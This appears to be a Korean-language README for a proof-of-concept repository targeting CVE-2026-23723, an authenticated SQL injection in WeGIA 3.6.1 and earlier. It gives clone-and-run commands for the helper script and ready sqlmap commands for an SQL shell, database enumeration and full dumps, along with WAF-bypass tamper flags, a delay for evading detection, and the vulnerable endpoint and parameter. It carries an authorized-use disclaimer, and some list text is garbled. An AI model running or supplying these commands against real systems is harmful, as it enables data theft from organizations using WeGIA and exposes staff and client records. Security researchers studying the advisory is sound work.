
WeGIA(≤ 3.6.1)의 인증된 오류 기반 SQL 인젝션 취약점(GHSA-xfmp-2hf9-gfjp로 식별됨)에 대한 sqlmap 호환 PoC 파일 생성을 자동화하도록 설계된 경량 Python 헬퍼 스크립트입니다.
WeGIA ≤ 3.6.1의 인증된 오류 기반 SQL 인젝션
GHSA-xfmp-2hf9-gfjp | 공식 권고
PoC 원작자 / 보고자: ViniCastro2001 GHSA 게시자: nilsonLazarin (프로젝트 관리자)
이 경량 Python 스크립트는 다음 작업을 자동화합니다:
id_memorando=1*로 표시됨)--sql-shell)requests 라이브러리 (대부분의 침투 테스트 환경에 이미 설치되어 있음)git clone https://github.com/Ch35h1r3c47/CVE-2026-23723-POC.git
cd CVE-2026-23723-POC
# 권장: 인터랙티브 비밀번호 프롬프트
python CVE-2026-23723.py --url http://target.com -u admin
# 비밀번호 직접 제공
python CVE-2026-23723.py --url http://target.com -u admin -p wegia
# 사용자 지정 출력 파일
python CVE-2026-23723.py --url http://target.com -u admin -p wegia --output custom.req
성공적으로 실행되면 스크립트는 다음을 수행합니다:
로그인 시도 wegia_sqlmap.req (또는 사용자 지정 파일 이름) 생성 즉시 사용 가능한 sqlmap 명령 표시
# 1. 인터랙티브 MySQL 유사 셸 (가장 권장)
sqlmap -r wegia_sqlmap.req --sql-shell --batch --dbms=mariadb
# 2. 현재 및 전체 데이터베이스 표시
sqlmap -r wegia_sqlmap.req --current-db --dbs --batch
# 3. wegia 데이터베이스의 테이블 목록
sqlmap -r wegia_sqlmap.req -D wegia --tables --batch
# 4. 특정 테이블 덤프 (예: funcionario)
sqlmap -r wegia_sqlmap.req -D wegia -T funcionario --dump --threads=2 --batch
# 5. 전체 wegia 데이터베이스 덤프 (주의!)
sqlmap -r wegia_sqlmap.req -D wegia --dump-all --threads=3 --batch --output-dir=./dump
선택적 sqlmap 플래그:
--proxy=http://127.0.0.1:8080 (Burp/ZAP 경유)
--tamper=space2comment,randomcase (기본 WAF 우회)
--delay=1 (탐지 회피를 위해 속도 저하)
자동 로그인이 실패하는 경우 브라우저를 통해 수동으로 로그인 → 전체 Cookie 헤더 복사 → sqlmap 직접 실행:
sqlmap -u "http://target.com/controle/control.php?nomeClasse=Atendido_ocorrenciaControle&metodo=listarTodosComAnexo&id_memorando=*" \
--cookie="PHPSESSID=xxxxxxxx; other_cookie=yyy" \
--sql-shell --batch
법적 고지 이 PoC는 교육 및 승인된 침투 테스트 목적으로만 제공됩니다. 승인되지 않은 시스템에 대한 무단 사용은 불법이며 금지됩니다. 저자와 기여자는 오용 또는 발생한 어떠한 손해에 대해서도 책임을 지지 않습니다. 참고 자료
GHSA-xfmp-2hf9-gfjp CVE-2026-23723